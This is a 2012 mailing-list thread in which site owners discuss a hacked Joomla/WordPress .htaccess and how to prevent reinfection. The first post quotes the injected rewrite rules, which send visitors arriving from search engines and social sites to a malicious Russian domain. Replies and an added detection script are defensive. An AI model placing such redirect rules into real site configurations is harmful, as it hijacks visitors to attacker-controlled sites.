Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012 16:32:01 -0300, Dr Beco wrote:

> Does anyone know how to protect against unauthorized change of .htaccess?

Uninstalling WordPress/Joomla/PHP-Nuke and all that frameworking stuff?

Just kidding, but having these pre-made environments on your server poses a real risk; you have to take care they are always updated and using the latest patches.

(...)

> http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk

(...)

> I know it is easy to fix. I just wonder if I can prevent that from
> happening again. I'm considering simply putting a cron job that rewrites my
> .htaccess from time to time! :)
>
> Anyone else saw this problem?

At the Google forum there's a link that can help you with this:

http://www.mastermindblogger.com/2011/14-ways-to-prevent-your-wordpress-blog-from-being-hacked/

So I guess there have to be a bunch of "how to protect Joomla" articles out there.

Greetings,

--
Camaleón

--
To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/k182vj$k87$7...@ger.gmane.org
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On 23/08/2012 3:32 AM, Dr Beco wrote:

> One of my sites, that has joomla (and not wordpress) also got hacked
> (again).

Is your Joomla along with all components/skins etc. up to date? Many of the hacked sites I look at are not up to date.

> the sysadmin told me that there was a php script entitled jos_jpxn.php
> running that was rewriting my .htaccess (lickface)

I quite often see Joomla sites that get hacked have a few PHP shells dropped around the place that the attacker then uses to do other things (reset passwords/change htaccess files/phishing sites etc.).

Also, if it is shared web hosting, are your permissions all set correctly? Do you know how PHP is configured on the server? If the permissions are wrong, say on the configuration file, and another site on the same server gets hacked, they may be able to read your configuration file, get the database details and reset/recover the admin password.

Personally I wouldn't trust a Joomla/Wordpress/whatever install once the site has been compromised like this - who knows what else has been changed. It may be best to reupload the site/database from a backup if you have one.
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
--- On Thu, 8/23/12, shthead li...@shthead.net wrote:

> From: shthead li...@shthead.net
> Subject: Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
> To: debian-user@lists.debian.org
> Date: Thursday, August 23, 2012, 1:27 AM
>
> On 23/08/2012 3:32 AM, Dr Beco wrote:
>> One of my sites, that has joomla (and not wordpress) also got hacked
>> (again).
>
> Is your Joomla along with all components/skins etc. up to date? Many of
> the hacked sites I look at are not up to date.

You are not alone. Not long ago my webhost posted an announcement about Joomla and Wordpress sites on their servers getting hacked. Make sure you're updated to the latest version.
Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Dear debianusers,

Does anyone know how to protect against unauthorized change of .htaccess?

I googled the htttp://reltime2012.ru/frunleh?9 redirect problem and found out that a lot of sites (mainly using wordpress) got hacked and are redirected to a Russian site.

One of my sites, that has joomla (and not wordpress) also got hacked (again).

In the beginning of the .htaccess one can read:

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
    RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]

I found some tutorials on how to fix the problem:

http://newmediamike.com/2012/07/reltime-2012-frunleh-redirection/
http://wptrainingonline.com/

But none of them explains how to protect and prevent the problem from happening again.

This Google forum has a post stating that

http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk

    the sysadmin told me that there was a php script entitled jos_jpxn.php
    running that was rewriting my .htaccess (lickface)

But I found no such script among my files.

(Of course, I changed my password, but I don't really think that is the problem...)

I know it is easy to fix. I just wonder if I can prevent that from happening again. I'm considering simply putting a cron job that rewrites my .htaccess from time to time! :)

Anyone else saw this problem?

Thanks,
Beco

--
Dr. Beco
A.I. research, Cognitive Scientist and Philosopher
Linux Counter #201942
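A defensive check for the kind of rule quoted in the message above, added here as an example and not part of the original thread: it scans .htaccess text for a RewriteRule that sends visitors to a foreign host only when a preceding RewriteCond tests HTTP_REFERER. The function name `find_referer_redirects`, the `own_hosts` parameter and the host `redirect.example` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the injected block quoted in the post;
# the host is a reserved .example name, not the one from the thread.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook)\.(.*)
RewriteRule ^(.*)$ http://redirect.example/landing?9 [R=301,L]

# Legitimate rule: internal rewrite, no referer condition
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
R_FLAG = re.compile(r"(^|,)\s*R(=\w+)?\s*(,|$)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return one finding per RewriteRule whose target is an absolute URL on a
    host outside own_hosts and which is gated by an HTTP_REFERER RewriteCond."""
    findings, pending = [], []   # pending: conditions waiting for their rule
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND.match(line)
        if m:
            pending.append((m.group(1), m.group(2)))
            continue
        m = RULE.match(line)
        if not m:
            continue
        target, flags = m.group(2), m.group(3) or ""
        host = urlsplit(target).hostname if "://" in target else None
        gated = any("HTTP_REFERER" in var.upper() for var, _ in pending)
        external = host is not None and host not in own_hosts
        if gated and external:
            findings.append({"line": lineno, "host": host,
                             "redirect": bool(R_FLAG.search(flags)),
                             "conds": list(pending)})
        pending = []   # RewriteCond lines apply only to the next RewriteRule
    return findings
```

Run over every .htaccess under the document root, a non-empty result is a reason to look for the script that wrote the rule rather than only deleting the rule.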
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012, Dr Beco wrote:

> Does anyone knows how to protect against unauthorized change of .htaccess?

If you have root access, try to use chattr to mark that file as immutable (chattr +i).

But really, if they keep changing your .htaccess, it means they have compromised the box, and will remain compromising it until you clean the box (probably rebuild from scratch) AND close the security holes.

--
  One disk to rule them all, One disk to find them. One disk to bring
  them all and in the darkness grind them. In the Land of Redmond
  where the shadows lie. -- The Silicon Valley Tarot
  Henrique Holschuh
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Henrique de Moraes Holschuh, Wed, 22 Aug 2012 16:41:59 -0300:

> If you have root access, try to use chattr to mark that file as immutable
> (chattr +i).
>
> But really, if they keep changing your .htaccess, it means they have
> compromised the box, and will remain compromising it until you clean the
> box (probably rebuild from scratch) AND close the security holes.

Dear Henrique,

For this system I don't have root access. It is managed abroad by a host farm. I already wrote to them to report the (second) problem.

I hope they find the main problem now, instead of just giving another quick fix. Also, I cannot ask them to reinstall the system from scratch, as the same server hosts more websites.

Thanks!
Beco

--
Dr. Beco
A.I. research, Cognitive Scientist and Philosopher
Linux Counter #201942
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012, Dr Beco wrote:

> For this system I don't have root access. It is managed abroad by a
> host farm. I already wrote to them to report the (second) problem.

I suggest you take your business elsewhere. You don't want to risk your name/site/domain being associated with criminals because some el-cheap-o hosting farm can't do their job properly.

--
  One disk to rule them all, One disk to find them. One disk to bring
  them all and in the darkness grind them. In the Land of Redmond
  where the shadows lie. -- The Silicon Valley Tarot
  Henrique Holschuh